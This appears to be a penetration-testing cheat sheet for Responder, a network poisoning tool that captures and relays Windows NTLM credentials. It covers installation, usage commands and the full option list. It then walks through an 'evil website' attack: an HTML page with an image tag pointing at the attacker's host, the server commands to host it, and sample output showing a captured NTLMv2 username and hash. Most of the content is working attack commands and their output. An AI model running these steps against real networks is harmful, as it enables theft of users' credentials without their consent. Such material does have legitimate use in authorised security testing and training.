Responder

LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.

Installation

git clone https://github.com/lgandx/Responder.git

Usage

Disable UFW before using.

python3 Responder.py -I eth0 -w -r -f

Flags

Usage: python ./Responder.py -I eth0 -w -r -f
or:
python ./Responder.py -I eth0 -wrf

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i 10.0.0.21, --ip=10.0.0.21
                        Local IP to use (only for OSX)
  -e 10.0.0.22, --externalip=10.0.0.22
                        Poison all requests with another IP address than
                        Responder's one.
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
                        False
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective when combined with
                        -r. Default: False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  -v, --verbose         Increase verbosity.

Examples

Analyse mode

sudo ./Responder.py -I <interface> -A -v

Full mode

sudo ./Responder.py -I <interface> -w -F --lm -v

Evil website

Works on:

  • Internet Explorer 8 (8.0.7600.16385, Windows 7)
  • Internet Explorer 8 (8.0.7601.17514, Windows Server 2008R2)
  • Internet Explorer 11 (11.719.18362.0, Windows 10)
  • Internet Explorer 11 (11.2273.14393.0, Windows Server 2016)
  • Internet Explorer 11 (11.1098.17763.0, Windows Server 2019)

Does not work on:

  • Microsoft Edge (44.18362.449.0 Windows 10)
  • Google Chrome (80.0.3987.149, Windows 10)
  • Brave (1.5.115, Windows 10)
  • Opera (67.0.3575.115, Windows 10)

Index.html content

cat index.html

<html>
<head></head>
<body>
<img src="\\10.10.10.37\picture.jpg" alt=""></img>
</body>
</html>

Host the site

python3 -m http.server 80

Start responder to catch hashes

responder -I eth0 -A -f -v
[...]
[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [10.10.10.37]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[!] Error starting TCP server on port 80, check permissions or other servers running.
[+] Listening for events...

Client browsed to site

Example

Hashes aquired

[SMB] NTLMv2-SSP Client   : 10.10.10.15
[SMB] NTLMv2-SSP Username : WS7-2\User
[SMB] NTLMv2-SSP Hash     : User::WS7-2:2f5d1007fc42a38e:74DF5D8A06BF0059BCCA1AB300782DED:0101000000000000C0653150DE09D2012E16D14827C3AF5500[...]

Find captured hashes

Folder /logs in the responder folder

 ~/tools/responder/logs
$ ll
total 22M
-rw-r--r-- 1 root root    0 Jun 19 09:09 Analyzer-Session.log
-rw-r--r-- 1 root root 226K Nov 25 08:55 Config-Responder.log
-rw-r--r-- 1 root root 2.3K Jul  7 10:23 HTTP-NTLMv2-10.0.0.30.txt
-rw-r--r-- 1 root root 1.2K Jul  7 09:06 HTTP-NTLMv2-10.0.0.35.txt
-rw-r--r-- 1 root root 1.2K Oct 26 11:17 HTTP-NTLMv2-10.1.25.122.txt

URL list